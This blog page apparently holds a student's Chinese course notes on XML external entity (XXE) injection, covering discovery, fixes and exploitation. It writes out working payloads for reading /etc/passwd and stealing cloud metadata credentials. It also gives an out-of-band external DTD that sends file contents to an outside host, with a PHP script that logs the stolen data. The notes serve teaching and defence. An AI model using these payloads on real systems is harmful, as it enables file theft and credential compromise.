<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zhigao.xyz","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"livere","storage":true,"lazyload":false,"nav":null,"activeClass":"livere"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta property="og:type" content="article">
<meta property="og:title" content="第71天-XML&amp;XXE&amp;无回显带外&amp;SSRF元数据&amp;DTD实体&amp;OOB盲注&amp;文件拓展&amp;复盘">
<meta property="og:url" content="http://zhigao.xyz/2026/09/15/%E7%AC%AC71%E5%A4%A9-XML-XXE-%E6%97%A0%E5%9B%9E%E6%98%BE%E5%B8%A6%E5%A4%96-SSRF%E5%85%83%E6%95%B0%E6%8D%AE-DTD%E5%AE%9E%E4%BD%93-OOB%E7%9B%B2%E6%B3%A8-%E6%96%87%E4%BB%B6%E6%8B%93%E5%B1%95-%E5%A4%8D%E7%9B%98/index.html">
<meta property="og:site_name" content="Voyage Memo">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-09-15T15:02:14.000Z">
<meta property="article:modified_time" content="2026-09-15T15:12:48.816Z">
<meta property="article:author" content="智高">
<meta property="article:tag" content="笔记">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://zhigao.xyz/2026/09/15/%E7%AC%AC71%E5%A4%A9-XML-XXE-%E6%97%A0%E5%9B%9E%E6%98%BE%E5%B8%A6%E5%A4%96-SSRF%E5%85%83%E6%95%B0%E6%8D%AE-DTD%E5%AE%9E%E4%BD%93-OOB%E7%9B%B2%E6%B3%A8-%E6%96%87%E4%BB%B6%E6%8B%93%E5%B1%95-%E5%A4%8D%E7%9B%98/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>第71天-XML&XXE&无回显带外&SSRF元数据&DTD实体&OOB盲注&文件拓展&复盘 | Voyage Memo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Voyage Memo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://zhigao.xyz/2026/09/15/%E7%AC%AC71%E5%A4%A9-XML-XXE-%E6%97%A0%E5%9B%9E%E6%98%BE%E5%B8%A6%E5%A4%96-SSRF%E5%85%83%E6%95%B0%E6%8D%AE-DTD%E5%AE%9E%E4%BD%93-OOB%E7%9B%B2%E6%B3%A8-%E6%96%87%E4%BB%B6%E6%8B%93%E5%B1%95-%E5%A4%8D%E7%9B%98/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/photo.jpg">
      <meta itemprop="name" content="智高">
      <meta itemprop="description" content="正因为我有能力跨越，这个考验才会降临!">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Voyage Memo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          第71天-XML&XXE&无回显带外&SSRF元数据&DTD实体&OOB盲注&文件拓展&复盘
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2026-09-15 23:02:14 / 修改时间：23:12:48" itemprop="dateCreated datePublished" datetime="2026-09-15T23:02:14+08:00">2026-09-15</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%E8%AF%BE%E7%A8%8B%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-web%E6%94%BB%E9%98%B2/" itemprop="url" rel="index"><span itemprop="name">小迪安全课程学习笔记(web攻防)</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><font></font></p>
<span id="more"></span>




<p><font style="color:#ff0000;background-color:#ffff00;">演示案例：</font></p>
<p><font style="color:#ff0000;background-color:#ffffff;">➢</font><font style="color:#ff0000;background-color:#ffffff;"> </font><font style="color:#ff0000;background-color:#ffffff;">WEB攻防-XML&amp;XXE-注入原理&amp;分类&amp;安全影响</font></p>
<p><font style="color:#ff0000;background-color:#ffffff;">➢</font><font style="color:#ff0000;background-color:#ffffff;"> </font><font style="color:#ff0000;background-color:#ffffff;">WEB攻防-XML&amp;XXE-文件读取&amp;SSRF&amp;外部实体</font></p>
<p><font style="color:#ff0000;background-color:#ffffff;">➢ WEB攻防-XML&amp;XXE-无回显利用&amp;文件拓展解析等</font></p>
<p><font style="background-color:#ffffff;"></font></p>
<h1 id="一、前置知识"><a href="#一、前置知识" class="headerlink" title="一、前置知识"></a>一、前置知识</h1><p>XML被设计为传输和存储数据，XML文档结构包括XML声明（第一行用来声明版本和编码）、DTD文档类型定义（可选， 用来约束 XML 里面标签、属性该怎么写，XXE 漏洞就出在 DTD 外部实体  ）、文档元素（ 自定义标签构成的树形结构（根节点、子节点），承载实际数据。  ），其焦点是数据的内容，其把数据从HTML分离，是独立于软件和硬件的信息传输工具。等同于JSON传输。</p>
<p>XML与HTML 的主要差异：</p>
<p>XML 被设计为传输和存储数据，其焦点是数据的内容。</p>
<p>HTML 被设计用来显示数据，其焦点是数据的外观。</p>
<p>HTML 旨在显示信息 ，而XML旨在传输存储信息。</p>
<p>XXE漏洞XML External Entity Injection，即xml外部实体注入漏洞：XXE漏洞发生在应用程序解析XML输入时，没禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网扫描、攻击内网等危害。</p>
<p>-XXE黑盒发现：</p>
<p>两类：</p>
<p>-数据包的测试</p>
<p>-功能点的测试</p>
<p>1、获取得到Content-Type或数据类型为xml时，尝试xml语言payload进行测试</p>
<p>2、不管获取的Content-Type类型或数据传输类型，均可尝试修改后提交测试xxe</p>
<p>3、XXE不仅在数据传输上可能存在漏洞，同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行</p>
<p>-XXE白盒发现：</p>
<p>1、可通过应用功能追踪代码定位审计</p>
<p>2、可通过脚本特定函数搜索定位审计</p>
<p>3、可通过伪协议玩法绕过相关修复等</p>
<p>XXE修复防御方案：</p>
<p>-方案1-禁用外部实体</p>
<p>PHP:</p>
<p>libxml_disable_entity_loader(true);</p>
<p>JAVA:</p>
<p>DocumentBuilderFactory dbf &#x3D;DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);</p>
<p>Python：</p>
<p>from lxml import etreexmlData &#x3D; etree.parse(xmlSource,etree.XMLParser(resolve_entities&#x3D;False))</p>
<p>-方案2-过滤用户提交的XML数据</p>
<p>过滤关键词：&lt;!DOCTYPE和&lt;!ENTITY，或者SYSTEM和PUBLIC</p>
<h1 id="二、有回显利用"><a href="#二、有回显利用" class="headerlink" title="二、有回显利用"></a>二、有回显利用</h1><p>1、文件读取：</p>
<?xml version="1.0"encoding="UTF-8"?>

<!DOCTYPE test[<!ENTITY xxe SYSTEM "file:///etc/passwd"><p>]&gt;</p>
<p><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck></p>
<p>2、SSRF&amp;配合元数据</p>
<p>条件：存在XXE注入的云服务器应用</p>
<?xml version="1.0"encoding="UTF-8"?>

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"><p>]&gt;</p>
<p><stockCheck><productId></p>
<p>&xxe;</p>
<p></productId><storeId>1</storeId></stockCheck></p>
<p><font style="background-color:#81BBF8;"><a target="_blank" rel="noopener" href="http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">http://169.254.169.254/latest/meta-data/iam/security-credentials/admin</a> </font><font style="color:rgb(0, 0, 0);background-color:#81BBF8;">169.254.169.254</font><font style="background-color:#81BBF8;"> 是 </font><font style="color:rgb(0, 0, 0);background-color:#81BBF8;">AWS EC2 云实例的链路本地元数据服务地址（IMDSv1）</font><font style="background-color:#81BBF8;">，</font><font style="color:rgb(0, 0, 0);background-color:#81BBF8;">只能从 EC2 实例本机内部访问，公网无法直接访问</font><font style="background-color:#81BBF8;">腾讯云。这里利用xxe漏洞让服务器自动去访问这个地址，就会返回敏感内容，例如aksk。</font></p>
<p>外部引用实体dtd：</p>
<?xml version="1.0" ?>

<!DOCTYPE test[

<!ENTITY % file SYSTEM "http://xiaodi8.com/file.dtd">

<p>%file;</p>
<p>]&gt;</p>
<p><user><username>&send;</username><password>xiaodi</password></user></p>
<p>file.dtd</p>
<!ENTITY send SYSTEM "file:///d:/x.txt">



<h1 id="三、无回显利用"><a href="#三、无回显利用" class="headerlink" title="三、无回显利用"></a>三、无回显利用</h1><p>1、带外测试</p>
<?xml version="1.0" ?>

<!DOCTYPE test[

<!ENTITY % file SYSTEM "http://xiaodi8.dnslog.cn">

<p>%file;</p>
<p>]&gt;</p>
<p><user><username>&send;</username><password>xiaodi</password></user></p>
<p>2、外部引用实体dtd配合带外</p>
<?xml version="1.0"?>

<!DOCTYPE ANY[

<!ENTITY % file SYSTEM "file:///c:/c.txt">

<!ENTITY % remote SYSTEM "http://www.xiaodi8.com/test.dtd">

<p>%remote;</p>
<p>%all;</p>
<p><font style="background-color:#ED740C;">这里只调用了remote和all为什么没有调用file，我们分析一下内部dtd子集，首先是两个外部实体参数的定义，然后是实体参数remote和all的调用，remote调用会去访问<a target="_blank" rel="noopener" href="http://www.xiaodi8.com/test.dtd%EF%BC%8Ctest.dtd%E7%9A%84%E5%86%85%E5%AE%B9%E4%B8%8B%E9%9D%A2%E5%86%99%E4%BA%86%EF%BC%8C%E7%84%B6%E5%90%8Etest.dtd%E7%9A%84%E5%86%85%E5%AE%B9%E4%BC%9A%E8%A2%AB%E5%B5%8C%E5%85%A5%E5%88%B0dtd%E5%86%85%E9%83%A8%E5%AD%90%E9%9B%86%E4%B8%AD%EF%BC%8C%E7%84%B6%E5%90%8E%E8%B0%83%E7%94%A8%E5%AE%9E%E4%BD%93%E5%8F%82%E6%95%B0all%EF%BC%8C%E5%88%9A%E5%88%9A%E5%B5%8C%E5%85%A5%E7%9A%84%E5%86%85%E5%AE%B9%E4%BC%9A%E8%A2%AB%E5%B1%95%E5%BC%80%EF%BC%8C%E5%9B%A0%E4%B8%BAfile%E5%AE%9E%E4%BD%93%E6%98%AF%E5%B5%8C%E5%85%A5%E5%88%B0all%E5%AE%9E%E4%BD%93%E7%9A%84%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%B8%AD%EF%BC%8C">http://www.xiaodi8.com/test.dtd，test.dtd的内容下面写了，然后test.dtd的内容会被嵌入到dtd内部子集中，然后调用实体参数all，刚刚嵌入的内容会被展开，因为file实体是嵌入到all实体的字符串中，</a> 等外层实体展开的时候，自动把里面的file一起展开。 </font> </p>
<p>]&gt;</p>
<p><user><username>&send;</username><password>xiaodi</password></user></p>
<p>test.dtd：</p>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://www.xiaodi8.com/get.php?file=%file;'><p>“&gt;</p>
<p>get.php:</p>
<?php

$data=$_GET['file'];

$myfile= fopen("file.txt", "w+");

fwrite($myfile, $data);

fclose($myfile);

?>



<p>test.dtd-&gt;all-&gt;send-&gt;get.php?file&#x3D;%file-&gt;file:&#x2F;&#x2F;&#x2F;c:&#x2F;c.txt</p>
<p><a target="_blank" rel="noopener" href="http://www.xiaodi8.com/get.php?file=%E8%AF%BB%E5%8F%96%E7%9A%84%E5%86%85%E7%BD%91%E6%95%B0%E6%8D%AE">http://www.xiaodi8.com/get.php?file=读取的内网数据</a></p>
<p>3、外部引用实体dtd配合错误解析</p>
<!ENTITY % file SYSTEM "file:///etc/passwd">

<!ENTITY % eval"<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'><p>“&gt;</p>
<p>%eval;</p>
<p>%exfil;</p>
<p><font style="background-color:#ED740C;">这里有疑问了为什么错误路径会把内容显示出来，因为system实体的逻辑是先把整个字符串拼接起来，实体展开完成之后，才去尝试访问这个路径<!ENTITY % file SYSTEM "file:///etc/passwd">这一步就拿到内容了。</font></p>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0ab2006f03dce8a4803dfde101f3007d.exploit-server.net/exploit"><p> %xxe;]&gt;</p>
<h1 id="四、升级拓展"><a href="#四、升级拓展" class="headerlink" title="四、升级拓展"></a>四、升级拓展</h1><p>1、xinclude利用</p>
<p>一些应用程序接收客户端提交的数据，在服务器端将其嵌入到XML文档中，然后解析该文档，所以利用xinclude嵌套进去执行</p>
<p><foo xmlns:xi="http://www.w3.org/2001/XInclude">&lt;xi:include parse&#x3D;”text”href&#x3D;”file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd”&#x2F;&gt;</foo></p>
<p><font style="background-color:#ED740C;">之前我们都是xml整体发到服务器的，这里比如发送的内容是user&#x3D;1&amp;&amp;pass&#x3D;2这种，但是它发送到服务器可能是拼接成<user>1</user><pass>2</pass>,所以我们只能控制内容，xinclude就是专门嵌入在普通xml元素内使用的</font></p>
<p>2、SVG图像解析（docx等）</p>
<p>一些应用程序接收解析文件，可以使用基于XML的格式的例子有DOCX这样的办公文档格式和SVG这样的图像格式进行测试</p>
<?xml version="1.0"standalone="yes"?>

<!DOCTYPE test[<!ENTITY xxe SYSTEM "file:///etc/hostname"><p>]&gt;&lt;svg width&#x3D;”128px”height&#x3D;”128px”xmlns&#x3D;”<a target="_blank" rel="noopener" href="http://www.w3.org/2000/svg">http://www.w3.org/2000/svg</a>“ xmlns:xlink&#x3D;”<a target="_blank" rel="noopener" href="http://www.w3.org/1999/xlink%22version=%221.1%22%3E">http://www.w3.org/1999/xlink&quot;version=&quot;1.1&quot;&gt;</a>&lt;text font-size&#x3D;”16”x&#x3D;”0”y&#x3D;”16”&gt;&xxe;</text></p>
</svg>

<p>3、见图</p>
<p>基于XML的Web服务： SOAP、REST和RPC API这些接收和处理XML格式</p>
<p>导入&#x2F;导出功能： 任何以 XML 格式传输数据的进出口</p>
<p><font style="color:#000000;">RSS&#x2F;Atom 订阅处理器： 订阅功能也可能隐藏着 XXE 漏洞。</font></p>
<p><font style="color:#000000;">文档查看器&#x2F;转换器： 处理DOCX、XLSX等XML 格式文档的功能</font></p>
<p><font style="color:#000000;">文件上传处理 XML： 比如SVG图像处理器，上传图片也可能中招！</font></p>
<p><font style="color:#000000;"></font></p>
<h1 id="五、复盘"><a href="#五、复盘" class="headerlink" title="五、复盘"></a>五、复盘</h1><p><font style="color:#000000;">SRC报告</font></p>
<p><font style="color:#000000;"><a target="_blank" rel="noopener" href="http://web.jarvisoj.com:9882/">http://web.jarvisoj.com:9882/</a></font></p>
<p><font style="color:#000000;background-color:#81BBF8;">这个抓包我们发现是参数是json格式，我们把内容直接改成xeepayload，content_type改为application&#x2F;xml然后就得到敏感内容了，太简单不演示了</font></p>
<p><font style="color:#000000;"><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/5iPoqsWpYfQmr0ExcJYRwg">https://mp.weixin.qq.com/s/5iPoqsWpYfQmr0ExcJYRwg</a></font></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%AC%94%E8%AE%B0/" rel="tag"># 笔记</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/09/15/%E7%AC%AC70%E5%A4%A9-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD-%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96-%E6%96%87%E4%BB%B6%E5%88%A0%E9%99%A4-%E7%B4%A2%E5%BC%95%E6%B3%84%E9%9C%B2-%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86-%E8%B7%AF%E5%BE%84%E7%A9%BF%E8%B6%8A-SRC%E5%A4%8D%E7%9B%98/" rel="prev" title="第70天-任意文件下载&文件读取&文件删除&索引泄露&目录遍历&路径穿越&SRC复盘">
      <i class="fa fa-chevron-left"></i> 第70天-任意文件下载&文件读取&文件删除&索引泄露&目录遍历&路径穿越&SRC复盘
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    
  <div class="comments">
    <div id="lv-container" data-id="city" data-uid="w0aFeK3v2HV9LRG7Ubh6"></div>
  </div>
  

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>


<livere-comment client-id="w0aFeK3v2HV9LRG7Ubh6"></livere-comment>
<script type="module" src="https://www.livere.org/livere-widget.js"></script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-number">1.</span> <span class="nav-text">一、前置知识</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E6%9C%89%E5%9B%9E%E6%98%BE%E5%88%A9%E7%94%A8"><span class="nav-number">2.</span> <span class="nav-text">二、有回显利用</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E6%97%A0%E5%9B%9E%E6%98%BE%E5%88%A9%E7%94%A8"><span class="nav-number">3.</span> <span class="nav-text">三、无回显利用</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E5%8D%87%E7%BA%A7%E6%8B%93%E5%B1%95"><span class="nav-number">4.</span> <span class="nav-text">四、升级拓展</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%94%E3%80%81%E5%A4%8D%E7%9B%98"><span class="nav-number">5.</span> <span class="nav-text">五、复盘</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="智高"
      src="/images/photo.jpg">
  <p class="site-author-name" itemprop="name">智高</p>
  <div class="site-description" itemprop="description">正因为我有能力跨越，这个考验才会降临!</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">45</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Spider-px" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Spider-px" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">智高</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script color='0,0,0' opacity='0.7' zIndex='' count='90' src="/lib/canvas-nest/canvas-nest-nomobile.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script>
NexT.utils.loadComments(document.querySelector('#lv-container'), () => {
  window.livereOptions = {
    refer: location.pathname.replace(CONFIG.root, '').replace('index.html', '')
  };
  (function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
  })(document, 'script');
});
</script>

</body>
</html>
